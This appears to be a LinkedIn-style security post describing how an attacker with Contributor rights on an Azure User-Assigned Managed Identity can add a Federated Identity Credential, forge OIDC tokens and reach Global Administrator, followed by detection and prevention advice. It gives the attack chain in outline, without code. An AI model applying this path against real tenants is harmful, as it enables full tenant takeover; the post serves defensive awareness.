Cloud environments often rely on automation identities such as Managed Identities and federated credentials to remove secrets from workloads. While this improves operational security, misconfigurations can introduce powerful privilege escalation paths.

How an attacker can escalate privileges from unauthorized access to Global Administrator by abusing:

👉 A User-Assigned Managed Identity (UAMI) with high-privilege API permissions

👉 Federated Identity Credential (FIC) injection

👉 Microsoft Entra token trust via OIDC federation

Attack Scenario

Assume the following misconfiguration exists in a tenant:

A User-Assigned Managed Identity exists.

The identity has high privilege Microsoft Graph API permissions or can be granted by a user with following API permissions, such as:

RoleManagement.ReadWrite.Directory

Application.ReadWrite.All

Directory.ReadWrite.All

An attacker can modify or add Federated Identity Credentials to that identity, which can be easily achive if attacker got contributor permission in UAMI level.

Unauthenticated Access

▼

Enumerate Azure resources

▼

Identify User Assigned Managed Identity (Contributor role in UAMI )

▼

Add malicious Federated Identity Credential

▼

Forge OIDC token

▼

Authenticate as the Managed Identity

▼

Use Graph permissions

▼

Assign Global Administrator

Key issues that enable the escalation:

-Over-privileged Managed Identities

-Managed identities often receive excessive Graph permissions.

-Federation Trust Abuse

-Federated credentials allow external IdPs to authenticate workloads.

Monitoring and Prevention

Because Federated Identity Credentials (FIC) allow external identity providers to authenticate workloads, they introduce a new identity trust boundary inside Microsoft Entra ID environments. When combined with high-privilege User-Assigned Managed Identities, misconfiguration can lead to severe privilege escalation.Organizations must implement continuous monitoring, strict permission governance, and identity hardening to prevent abuse.

Detection Strategies

Monitor:

Federated credential creation

Log source:

AuditLogs

Privileged API permission assignments (all highly priviliged API permissions)

Look for:

Directory.ReadWrite.All

RoleManagement.ReadWrite.Directory

Identity token issuance anomalies

Look for unusual OIDC issuers.

Conclusion

The attack highlights a growing class of identity-based privilege escalation paths in cloud environments, where control over trust relationships can replace traditional credential theft.As organizations increasingly rely on workload identities and secretless authentication, identity configuration security becomes critical to preventing tenant-level compromise.

#security #azure #privesc #microsoft #entra #globaladmin #tenant #FIC #fedcred